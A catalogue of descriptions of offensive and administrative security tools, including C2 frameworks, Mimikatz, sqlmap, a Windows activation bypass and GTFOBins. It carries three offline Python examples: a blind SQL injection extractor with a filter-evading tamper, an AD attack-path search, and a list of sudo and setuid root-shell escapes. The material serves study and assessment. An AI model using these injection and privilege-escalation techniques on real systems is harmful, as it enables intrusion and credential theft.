These tools identify security misconfigurations and vulnerabilities to automate privilege escalation testing on Linux and Windows.
HEUKMSActivator is a Windows activation tool that automates the registration and validation of product keys for operating systems and office productivity suites. Despite the "license management" framing, its mechanics are those of an activation bypass: it edits registry settings and service states so that licensing status matches the chosen deployment, loads a signed driver into memory to intercept license verification routines, patches that verification code in memory so that nothing on disk changes, hooks system file functions to redirect internal calls, and runs a local server that emulates an official KMS activation service. All of this executes with administrative privileges, because it has to modify protected configuration files and produce activation tokens the licensing stack accepts as signed. A practitioner should weigh it accordingly: a tool that loads drivers, patches process memory and stands up a fake activation endpoint as an administrator is indistinguishable in behaviour from a loader, is commonly flagged as a hack tool by endpoint protection, and extends full trust to its author. Beyond activation, the tool offers software lifecycle administration and system configuration automation, and ships a defined set of project principles for its codebase.
Empire is a post-exploitation framework and command and control (C2) server for managing remote access agents. It provides a centralized console for coordinating those agents and executing modules against target systems. Its listeners shape their network traffic (request URIs, headers, user agents, beacon delay and jitter) through configurable communication profiles so that agent check-ins blend in with normal traffic and get past firewalls and monitoring tools. Agents are implemented in PowerShell, Python and C#, and a modular plugin architecture lets the framework run payloads across different operating systems. Its capabilities cover remote agent orchestration, privilege escalation workflows, credential and intelligence gathering, and agent lifecycle management for maintaining persistent access.
This project is a comprehensive cybersecurity tool collection designed to support security research, penetration testing, and vulnerability assessment. It functions as a unified penetration testing suite, providing a centralized environment where professionals can access a wide range of offensive security utilities to identify system weaknesses and study attack vectors. The platform distinguishes itself through a modular architecture that aggregates disparate security scripts into a single, hierarchical command-line interface. It simplifies the management of these utilities by integrating external repositories, allowing users to fetch and organize third-party tools directly into a structured local directory. By utilizing a categorized menu system and shell-based process execution, the suite enables efficient navigation and direct invocation of specialized tools for tasks ranging from forensic analysis and reverse engineering to exploit development. The toolkit covers a broad spectrum of security domains, including web and wireless attack vectors, cloud security, payload creation, and social media analysis. It also incorporates automated environment setup to handle the installation of necessary system packages and language runtimes, ensuring compatibility across its diverse collection of utilities.
This project is a comprehensive, community-sourced knowledge base designed for security professionals and researchers. It functions as a centralized repository of offensive security techniques, providing a structured collection of exploit payloads, attack vectors, and methodologies for conducting vulnerability assessments and penetration testing. The repository distinguishes itself through a cross-platform payload taxonomy that categorizes exploitation methods by vulnerability type and target environment, enabling rapid lookup during security assessments. It maintains high standards of data integrity and collaborative growth by utilizing version-controlled knowledge management and template-driven content generation, ensuring that the research remains current and consistent across a wide range of technical domains. The project covers a broad capability surface, including detailed references for web application security, database injection, insecure deserialization, and AI model security testing. It also aggregates external resources, such as research papers and third-party tools, to provide a holistic view of modern threat analysis and defensive research. The documentation is organized as a hierarchical tree of markdown files, designed for easy navigation and reference during active security engagements.
GTFOBins is a curated knowledge base documenting how standard Unix binaries can be abused during security assessments. It serves as a reference for offensive security work, detailing how pre-installed system utilities can be repurposed for privilege escalation, escaping restricted shells, and post-exploitation tasks. The binaries themselves are not vulnerable: the project catalogs legitimate functions (spawning a shell, running a command, reading or writing files, opening network sockets, loading libraries) that become escalation vectors when a binary is reachable through sudo, carries the setuid bit or file capabilities, or is the only thing available inside a restricted shell. By indexing these functions per binary, the repository gives a structured way to audit local permissions, which is why the output of sudo -l and a listing of setuid files are normally the first things checked against it. The platform is built as a static site that separates content from presentation: each binary is described in a standardized data file, a template-driven build generates the documentation, and a pre-computed index provides client-side search in the browser without a backend database.
The framework is a comprehensive penetration testing platform designed for the development, testing, and execution of security exploits. It serves as a research toolkit and automated assessment environment, enabling security professionals to identify and validate vulnerabilities within networked systems and infrastructure through repeatable, standardized procedures. The platform distinguishes itself through a modular architecture that supports reflective payload injection, allowing for the execution of code directly in memory without writing to disk. It utilizes an asynchronous event loop to manage high-performance, concurrent network connections and features a transport-agnostic communication layer that abstracts protocols to maintain persistent command and control. Users can extend the core functionality through a plugin system and define complex exploit logic using a domain-specific language. The framework provides robust capabilities for remote payload management, including the configuration of network settings like sleep intervals and timeout thresholds. It maintains state persistence across long-running sessions by storing discovered host information and vulnerability data in a relational database. The software is designed for cross-platform deployment, with installation support available for Linux, macOS, and Windows environments.
PEASS-ng (Privilege Escalation Awesome Scripts Suite) is a set of local privilege escalation enumeration scripts: linPEAS for Linux and other Unix-like systems and winPEAS for Windows. Rather than a full penetration testing framework, it is an assessment utility that scans a host for misconfigurations, sensitive files, and insecure permissions that could allow elevation of privilege. The project distinguishes itself through a modular, script-based enumeration engine that adapts to the target: it detects which commands and capabilities are available, abstracts over shell differences to normalize collection across operating systems, and can be run straight from memory (for example piped from a download into the shell) so that it leaves few artifacts on disk. The scripts apply pattern-matching heuristics to system configuration and colour-code the likely escalation vectors, but they exploit nothing: output is long and noisy by design, and a human still has to confirm each candidate. It is intended for authorized security assessments and produces the findings that privilege escalation testing on Linux and Windows usually starts from.
This project is an automated security testing suite for detecting and exploiting SQL injection in web applications. It is a command-line utility that streamlines identification, verification, and exploitation by injecting crafted payloads into request parameters and reading the application's responses. Once an injection point is confirmed it provides a full framework for database enumeration, so that schema information, user data, and system configuration can be pulled out through the same channel. What distinguishes the tool is its engine for dynamic payload adaptation and heuristic fingerprinting, which identifies the backend database and adjusts the injection technique (boolean-based blind, time-based blind, error-based, UNION-based, stacked queries) from the server's responses in real time. It supports post-exploitation through the database, including command execution on the underlying host and file system access, where the database account's privileges allow it. For restricted environments it offers out-of-band data exfiltration channels and a middleware pipeline of tamper scripts that apply user-defined transformations to every payload in order to slip past input filters and web application firewalls. The suite also handles stateful sessions, anti-CSRF tokens, and extensive request customization; targets can be specified directly, from saved requests, or from proxy logs, the scanner can be driven remotely through an API, and scan speed and detection thresholds are tunable. The software is distributed as a command-line application, configured through command-line arguments or an external configuration file.
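The boolean-based blind inference and the tamper pipeline described above, as an added example that is not the tool's own code. It runs against an in-memory SQLite database with a constructed products table and users table, a constructed keyword filter standing in for a WAF rule, and one tamper that turns spaces into empty SQL comments. The vulnerable lookup answers only whether a row came back, and the extractor recovers a stored password hash one character at a time from that single bit; the fixed, parameterized lookup sits beside it so the two behaviours can be compared on the same input.

```python
"""Boolean-based blind SQL injection with a tamper pipeline.

Added example, not the tool's own code. Uses an in-memory SQLite
database, a constructed keyword filter and constructed tables so the
whole exchange runs offline.
"""
import sqlite3
from typing import Callable, List

Oracle = Callable[[str], bool]


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)  # constructed data; the hash is just a sample string
    return con


def vulnerable_lookup(con: sqlite3.Connection, product_id: str) -> bool:
    """Vulnerable: the parameter is spliced into the statement. The caller
    only learns whether a row came back, i.e. one bit per request."""
    sql = f"SELECT name FROM products WHERE id = {product_id}"
    return con.execute(sql).fetchone() is not None


def safe_lookup(con: sqlite3.Connection, product_id: str) -> bool:
    """Fixed form: the value is bound, so it can never alter the query."""
    row = con.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchone()
    return row is not None


def toy_filter(payload: str) -> bool:
    """Constructed keyword rule standing in for a WAF: True means block."""
    upper = payload.upper()
    return " AND " in upper or " OR " in upper


def space2comment(payload: str) -> str:
    """Tamper: replace spaces with an empty comment, which the SQL parser
    treats as whitespace but a naive keyword filter does not."""
    return payload.replace(" ", "/**/")


class Blocked(Exception):
    pass


def make_oracle(con, tampers: List[Callable[[str], str]], waf=toy_filter) -> Oracle:
    """Payload goes through the tamper chain, then the filter, then the app."""
    def oracle(payload: str) -> bool:
        for tamper in tampers:
            payload = tamper(payload)
        if waf(payload):
            raise Blocked(payload)
        return vulnerable_lookup(con, payload)
    return oracle


def extract_blind(oracle: Oracle, subquery: str, max_len: int = 64) -> str:
    """Recover a string from a true/false oracle: confirm the length, then
    binary-search each character's code point (7 requests per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"1 AND length(({subquery})) >= {pos}"):
            break
        lo, hi = 0, 127  # assumes printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"1 AND unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


TARGET = "SELECT password_hash FROM users WHERE username = 'admin'"


def run_demo() -> dict:
    con = build_db()
    result = {"plain_blocked": False, "tampered": None,
              "safe_baseline": safe_lookup(con, "1"),
              "safe_injected": safe_lookup(con, "1 AND 1=1")}
    try:
        extract_blind(make_oracle(con, []), TARGET)
    except Blocked:
        result["plain_blocked"] = True  # the keyword rule catches ' AND '
    result["tampered"] = extract_blind(make_oracle(con, [space2comment]), TARGET)
    return result


if __name__ == "__main__":
    print(run_demo())
```

The tamper is applied to the whole payload, so a subquery whose string literals contain spaces would need a different transformation; that is exactly why real tools ship many tamper scripts and let you chain them. The parameterized lookup returns False for the injected value because the bound text never becomes part of the statement.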
Shizuku is an Android framework that lets ordinary applications call restricted system-level APIs and services. It acts as a bridge between unprivileged app sandboxes and protected system functions, so that apps can perform operations the platform sandbox would otherwise block. It works by running a persistent server process with elevated rights, started either from a rooted shell or, without root, through the Android Debug Bridge (adb), which launches it under the shell user; apps then bind to this server and relay their calls to internal system services through it, so system-level tasks and permission management work without full root. Because the privilege comes from the adb shell identity rather than from root, the server has to be restarted after every reboot unless it was started as root, and any app the user authorizes in Shizuku effectively gains the shell user's capabilities, which makes the per-app grant the real trust boundary. The framework also includes tooling for intercepting and redirecting calls to internal interfaces, for checking the current execution environment, and for building utilities that need elevated capabilities while keeping system-level authorization structured.
This project is a curated knowledge base and technical reference for shell scripting, focused on performing common system tasks using only built-in shell features. It serves as a guide for implementing logic and automation without relying on external binaries or dependencies, ensuring scripts remain portable across standard Unix-like environments. The repository distinguishes itself by emphasizing native shell functions and syntax to minimize process forking and improve execution performance. It provides idiomatic patterns for complex string transformations, pattern matching, and data flow management, allowing developers to replace heavy external utilities with efficient, built-in alternatives. The collection covers a broad range of system administration and automation techniques, including file management, configuration handling, and environment isolation. The documentation is structured as a technical resource for developers seeking to write portable, lightweight scripts that function consistently across different command-line environments.
Nishang is a PowerShell-based offensive security framework designed for red teaming and penetration testing on Windows targets. It functions as a post-exploitation toolkit and payload generator to automate attacks and manage remote targets. The project provides specialized capabilities for bypassing security controls, such as disabling the Antimalware Scan Interface and employing in-memory execution to avoid disk-based detection. It includes a variety of stealthy command and control mechanisms, utilizing non-standard channels like DNS TXT records, ICMP traffic, and webmail for communication and data exfiltration. The framework covers a broad surface of offensive operations, including privilege escalation through token manipulation, credential harvesting from memory and registry hives, and the generation of weaponized documents. It also facilitates lateral movement via network pivoting, man-in-the-middle traffic interception, and the establishment of persistent backdoors. The toolset is implemented primarily in PowerShell.
This project is a comprehensive technical reference and educational resource designed to improve proficiency with command-line interfaces. It functions as a productivity toolkit, providing a structured knowledge base of essential terminal operations, system administration tasks, and high-impact command sequences for daily development workflows. The guide distinguishes itself through its cross-platform approach, offering standardized documentation that maps utility usage across Linux, macOS, and Windows environments. It provides specific guidance for managing native tools and compatibility layers, ensuring a consistent experience regardless of the underlying operating system. By segmenting technical instructions into platform-specific references, the project enables users to navigate unique system behaviors and configurations effectively. Beyond fundamental operations, the resource covers advanced scripting techniques, system debugging, and data processing workflows. It includes curated collections of concise one-liners and lesser-known utilities intended to optimize complex tasks and automate repetitive maintenance. The content is maintained through community-driven curation, utilizing a structured, markdown-based format to ensure the information remains accurate and accessible.
BloodHound is an Active Directory attack path mapper and security auditor that visualizes trust relationships and permission chains. It serves as an attack surface management tool that finds paths from any principal to Domain Admins and other high-privilege targets. Relationships collected from the domain (group membership, local administrator rights, logged-on sessions, ACL rights such as GenericAll, and domain trusts) are loaded into a graph database, Neo4j, where each relationship is a directed edge and a path query becomes a graph traversal. It quantifies privilege escalation risk by surfacing misconfigured permissions and trust links within Windows domains and by showing which single relationships sit on the most paths. Results are only as good as collection: the graph is a snapshot from the collector's vantage point, and sessions in particular change constantly, so a path should be re-verified before it is reported or acted on. The system covers Active Directory security analysis, identity and access auditing, and attack path visualization for both offensive assessment and defensive remediation.
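An added example (not BloodHound's code, schema or collector output) of the graph analysis behind attack path mapping: a constructed domain of users, groups and computers linked by MemberOf, AdminTo, HasSession and GenericAll edges, a breadth-first search for the shortest path from a principal to Domain Admins, the set of users that have any path at all, and a what-if pass that scores which single relationship to remove for the largest reduction in exposure. Node and edge names are invented; the edge semantics follow BloodHound's conventions.

```python
"""Attack-path search over an AD-style relationship graph.

Added example, not BloodHound's own code. Nodes and edges are
constructed; edge names follow BloodHound's conventions but nothing
here reads real collector output.
"""
from collections import deque
from typing import Dict, List, Optional, Set, Tuple

Edge = Tuple[str, str, str]  # (source, relationship, target), traversed source -> target

# Constructed domain: membership, local admin rights, logged-on sessions,
# and one full-control ACL over a service account.
NODES: Dict[str, str] = {
    "alice": "User", "bob": "User", "carol": "User", "dave": "User", "svc_backup": "User",
    "HELPDESK": "Group", "IT": "Group", "SALES": "Group", "DOMAIN ADMINS": "Group",
    "WS01": "Computer", "WS02": "Computer",
}
EDGES: List[Edge] = [
    ("alice", "MemberOf", "HELPDESK"),
    ("HELPDESK", "AdminTo", "WS01"),
    ("WS01", "HasSession", "bob"),        # bob's credentials sit in memory on WS01
    ("bob", "MemberOf", "DOMAIN ADMINS"),
    ("carol", "MemberOf", "IT"),
    ("IT", "GenericAll", "svc_backup"),   # IT can reset svc_backup's password
    ("svc_backup", "MemberOf", "DOMAIN ADMINS"),
    ("dave", "MemberOf", "SALES"),
    ("SALES", "AdminTo", "WS02"),         # admin rights, but no session to harvest
]


def adjacency(edges: List[Edge]) -> Dict[str, List[Tuple[str, str]]]:
    adj: Dict[str, List[Tuple[str, str]]] = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    return adj


def shortest_path(edges: List[Edge], start: str, target: str) -> Optional[List[Edge]]:
    """Breadth-first search: the fewest hops from start to target, or None."""
    adj = adjacency(edges)
    parent: Dict[str, Optional[Edge]] = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path: List[Edge] = []
            while parent[node] is not None:
                edge = parent[node]
                path.append(edge)
                node = edge[0]
            return list(reversed(path))
        for rel, nxt in adj.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel, nxt)
                queue.append(nxt)
    return None


def exposed_users(edges: List[Edge], target: str = "DOMAIN ADMINS") -> Set[str]:
    """Every User node with at least one path to the target group."""
    return {n for n, kind in NODES.items()
            if kind == "User" and shortest_path(edges, n, target) is not None}


def fix_candidates(edges: List[Edge], target: str = "DOMAIN ADMINS") -> List[Tuple[Edge, int]]:
    """What-if: removing which single edge leaves the fewest users exposed?
    Returns (edge, users still exposed), best fix first."""
    baseline = len(exposed_users(edges, target))
    scored = []
    for edge in edges:
        remaining = [e for e in edges if e != edge]
        scored.append((edge, len(exposed_users(remaining, target))))
    scored.sort(key=lambda item: item[1])
    return [s for s in scored if s[1] < baseline]


if __name__ == "__main__":
    for user in sorted(exposed_users(EDGES)):
        hops = shortest_path(EDGES, user, "DOMAIN ADMINS")
        print(user, "->", " -> ".join(f"{rel} {dst}" for _, rel, dst in hops))
    total = sum(kind == "User" for kind in NODES.values())
    print("exposed:", len(exposed_users(EDGES)), "of", total)
    print("best single fix:", fix_candidates(EDGES)[0])
```

On this graph alice reaches Domain Admins in four hops through a session on a workstation she administers, while dave has admin rights on a machine with no session and no path. The what-if scoring shows the usual pattern: removing a direct Domain Admins membership (bob, or the service account) cuts the most paths, while breaking any single hop on alice's chain only removes her.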
Termux is a mobile terminal emulator and Linux environment runtime that provides a full command-line interface directly on Android devices. It functions as a comprehensive platform for executing native binaries and scripts, featuring an integrated package management system that allows users to download, install, and manage open-source software repositories to extend device functionality. The project distinguishes itself by acting as an embedded execution library, enabling third-party applications to integrate terminal and package management capabilities into their own interfaces without requiring custom forks. It achieves this through a modular architecture that executes code as native libraries, effectively bypassing mobile operating system restrictions that typically prevent the execution of arbitrary binaries from application data folders. To maintain security, the system employs process-isolation-based sandboxing and validates canonical paths to prevent unauthorized command injection or shortcut manipulation. Beyond its core terminal capabilities, the project supports advanced automation through an intent-based system that allows external applications to trigger shell commands. It ensures software portability across different device storage configurations by utilizing dynamic environment-variable-based path resolution. The environment also includes built-in diagnostic tools for log-aggregation-based debugging and maintains a structured process for managing security disclosures and vulnerability reporting.
This project is a post-exploitation and privilege escalation script suite that scans local system configuration for security gaps. It is a system enumeration toolset for finding routes to higher privileges on a host that has already been accessed, and it supports penetration testing and vulnerability assessment reporting. The scripts enumerate the system from the shell and match the results against patterns for known misconfigurations, applying heuristic permission analysis to flags such as setuid and setgid bits, file capabilities, and world-writable paths and services. Findings can be exported as structured JSON, HTML, or PDF for reporting. Cross-platform scripting logic keeps the scanning behaviour consistent across operating systems.
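As an added example, and not code from GTFOBins, PEASS-ng or the script suite described above, the following Python script shows the core of what these enumeration tools do once data is collected: it parses sudo -l output and a setuid file listing, matches each binary against a small catalogue of well-known GTFOBins techniques, and attaches the caveats that decide whether a hit is actually usable (arguments pinned by sudoers, a password prompt, a setuid bit that belongs to a user other than root). The sample sudo output and file list are constructed; the catalogue entries are real GTFOBins techniques but only a handful of them; walk_suid is the live-host collector you would use in place of the constructed list.

```python
"""GTFOBins-style triage of sudo rules and setuid binaries.

Added example, not code from GTFOBins, PEASS-ng or the suite above.
The catalogue is a hand-picked subset of well-known GTFOBins entries;
the inputs are constructed stand-ins for `sudo -l` output and a file list.
"""
import os
import re
import stat
from typing import Dict, Iterable, List, Tuple

# Binary name -> technique per context. 'sudo' assumes the binary may be run
# via sudo with free arguments; 'suid' assumes it is setuid root (the -p flag
# keeps bash from dropping the effective uid).
CATALOGUE: Dict[str, Dict[str, str]] = {
    "find":   {"sudo": "sudo find . -exec /bin/sh \\; -quit",
               "suid": "./find . -exec /bin/sh -p \\; -quit"},
    "vim":    {"sudo": "sudo vim -c ':!/bin/sh'"},
    "python": {"sudo": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
               "suid": "./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"},
    "bash":   {"sudo": "sudo bash", "suid": "./bash -p"},
    "less":   {"sudo": "sudo less /etc/profile  # then type !/bin/sh at the pager prompt"},
}

# One rule line of `sudo -l`: "(runas) TAG: TAG: command [args]".
SUDO_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")


def canonical_name(path: str) -> str:
    """/usr/bin/python3.11 -> 'python', so versioned binaries hit the catalogue."""
    return re.sub(r"\d+(\.\d+)*$", "", os.path.basename(path))


def parse_sudo_l(text: str) -> List[dict]:
    """Extract the command rules from `sudo -l` output; header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        tokens = m.group("cmd").split()
        rules.append({
            "runas": m.group("runas"),
            "binary": tokens[0],
            "args_fixed": len(tokens) > 1,  # sudoers pins the arguments
            "nopasswd": "NOPASSWD:" in m.group("tags"),
        })
    return rules


def walk_suid(root: str = "/") -> Iterable[Tuple[str, int, int]]:
    """Live-host collector: yield (path, mode, uid) for setuid regular files."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode, st.st_uid


def triage(sudo_text: str, files: Iterable[Tuple[str, int, int]]) -> List[dict]:
    """Match sudo rules and setuid files against the catalogue, with caveats."""
    findings = []
    for rule in parse_sudo_l(sudo_text):
        if rule["binary"] == "ALL":
            findings.append({"source": "sudo", "binary": "ALL",
                             "technique": "sudo -i", "caveats": []})
            continue
        technique = CATALOGUE.get(canonical_name(rule["binary"]), {}).get("sudo")
        caveats = []
        if technique and rule["args_fixed"]:
            caveats.append("sudoers fixes the arguments; the escape needs argument control")
        if not rule["nopasswd"]:
            caveats.append("password prompt: needs the current user's password")
        findings.append({"source": "sudo", "binary": rule["binary"],
                         "technique": technique, "caveats": caveats})
    for path, mode, uid in files:
        if not mode & stat.S_ISUID:
            continue
        technique = CATALOGUE.get(canonical_name(path), {}).get("suid")
        caveats = [] if uid == 0 else [f"setuid to uid {uid}, not root"]
        findings.append({"source": "suid", "binary": path,
                         "technique": technique, "caveats": caveats})
    return findings


# Constructed sample data standing in for a real host.
SAMPLE_SUDO_L = """\
Matching Defaults entries for bob on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/bin

User bob may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim
    (root) NOPASSWD: /usr/bin/python3 /opt/app/healthcheck.py
"""
SAMPLE_FILES = [
    ("/usr/bin/passwd", 0o104755, 0),      # setuid root, expected, not in catalogue
    ("/usr/bin/find", 0o104755, 0),        # setuid root find: shell as root
    ("/usr/bin/python3", 0o100755, 0),     # no setuid bit: ignored
    ("/opt/backup/bash", 0o104755, 1001),  # setuid, but not root-owned
]

if __name__ == "__main__":
    for f in triage(SAMPLE_SUDO_L, SAMPLE_FILES):
        print(f"[{f['source']}] {f['binary']}: {f['technique'] or 'no catalogue entry'}"
              + "".join(f"\n    ! {c}" for c in f["caveats"]))
```

On the constructed host the NOPASSWD find rule and the setuid find binary are clean root shells, the vim rule works but needs bob's password, the python3 rule has its script argument pinned by sudoers, and the setuid bash in /opt/backup only reaches uid 1001. Real tools emit hundreds of lines of this kind; the caveats are what separate the one finding worth chasing from the noise.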
This project serves as a centralized, community-driven repository of technical knowledge and administrative resources. It provides a structured taxonomy that aggregates disparate information into a searchable framework, supporting continuous learning and rapid problem-solving for system administrators and cybersecurity practitioners. By mapping resources across offensive security, infrastructure management, and software development, it offers a unified path for skill acquisition and professional reference. The project is defined by a command-line-first design philosophy, prioritizing terminal-based utilities and scriptable interfaces to facilitate efficient system administration and repeatable security workflows. It distinguishes itself through a platform-agnostic approach, maintaining documentation and operational guides that remain applicable across diverse Unix-like and cloud-based environments. This modular toolchain integration allows users to compose custom environments tailored to specific administrative or security tasks. The repository covers a broad capability surface, including comprehensive toolkits for system auditing, network management, and infrastructure hardening. It provides structured learning paths for cybersecurity skill development, ranging from ethical hacking labs and penetration testing standards to vulnerability assessment and system configuration best practices. The collection also encompasses a wide array of productivity tools, diagnostic utilities, and educational materials designed to streamline routine maintenance and enhance overall security posture.
Mimikatz is a Windows credential extraction and authentication research tool, used by penetration testers and by real intrusions alike. It pulls secrets (plaintext passwords where still available, NTLM hashes, Kerberos tickets and keys) out of the memory of the Local Security Authority Subsystem Service (LSASS) or from offline memory dumps, manipulates process privileges and tokens, and manages identity material such as certificates. The project distinguishes itself through system-level techniques including runtime process injection, API hooking, and patching of the cryptographic providers so that private keys marked non-exportable can be exported. Its Kerberos module inspects, forges, and injects tickets (golden and silver tickets, pass-the-ticket) to evaluate domain identity security. It also reads secrets from the Security Account Manager (SAM) database and the LSA secrets store, and can replicate credential data from a domain controller through the directory replication protocol (DCSync) when the caller holds replication rights. Beyond extraction, the suite includes utilities for services, certificates, and cryptographic providers, privilege escalation, user session impersonation, and observability features such as session logging, output encoding, and network route monitoring. Two caveats for practitioners: most of this needs local administrator rights plus SeDebugPrivilege, and LSA protection (RunAsPPL) or Credential Guard blocks or limits memory extraction; and the binary and its in-memory variants are signatured by essentially every endpoint product, so using it during an assessment is itself a detection test.
This project is a centralized management interface designed for the optimization, configuration, and maintenance of Windows desktop operating systems. It provides a comprehensive suite of tools for system debloating, automated software deployment, and deep-level performance tuning, allowing users to modify low-level settings that are otherwise inaccessible through standard interfaces. The platform distinguishes itself through its ability to create personalized, custom installation images, enabling users to remove unwanted components, bypass hardware checks, and pre-configure system defaults before deployment. It utilizes a declarative preset system that maps user-selected options to specific registry modifications and command sequences, ensuring consistent environments across multiple machines. Furthermore, the tool includes a state-reversion mechanism that tracks applied changes, providing a reliable way to undo specific tweaks and restore the system to a previous configuration state. Beyond core optimization, the project covers a broad range of administrative capabilities, including bulk software installation, network and DNS configuration, and the management of system update behaviors. It also integrates diagnostic utilities for system repair and recovery, helping to resolve common configuration errors, file corruption, and connectivity issues through automated scripts. The utility is built on a foundation of modular PowerShell scripts, providing a centralized command-line interface for orchestrating complex administrative tasks and standardizing system environments.
This project provides a command-line interface for managing the lifecycle of applications from the Apple App Store. It functions as a package manager for macOS, enabling users to search for software, install new applications, and maintain existing installations directly through terminal commands. The tool distinguishes itself by wrapping private system APIs to perform store operations that are typically restricted to the graphical user interface. It integrates with the operating system to handle administrative privilege elevation, allowing for secure, automated modifications to protected application files during installation and update processes. Beyond basic installation, the utility facilitates system maintenance by auditing installed software and comparing local versions against official store metadata. This allows for the identification of outdated applications and the automation of software updates across multiple machines, supporting consistent environment provisioning through scripted workflows.
This project is a post-exploitation framework and command and control platform designed for security research and penetration testing. It functions as a remote access tool consisting of a central command server and encrypted executable payloads that establish reverse shell connections. The system utilizes a web-based dashboard for multi-client administration, allowing for remote host monitoring and direct shell access through an in-browser terminal. It generates cross-platform, encrypted binaries that employ a multi-stage delivery chain and a key exchange mechanism to secure communications. The platform includes capabilities for in-memory module execution to avoid disk artifacts, alongside sandbox and virtual machine detection to evade security software. Its functional surface covers post-exploitation tasks such as remote privilege escalation and data collection through a suite of modules for keystroke capture and network sniffing.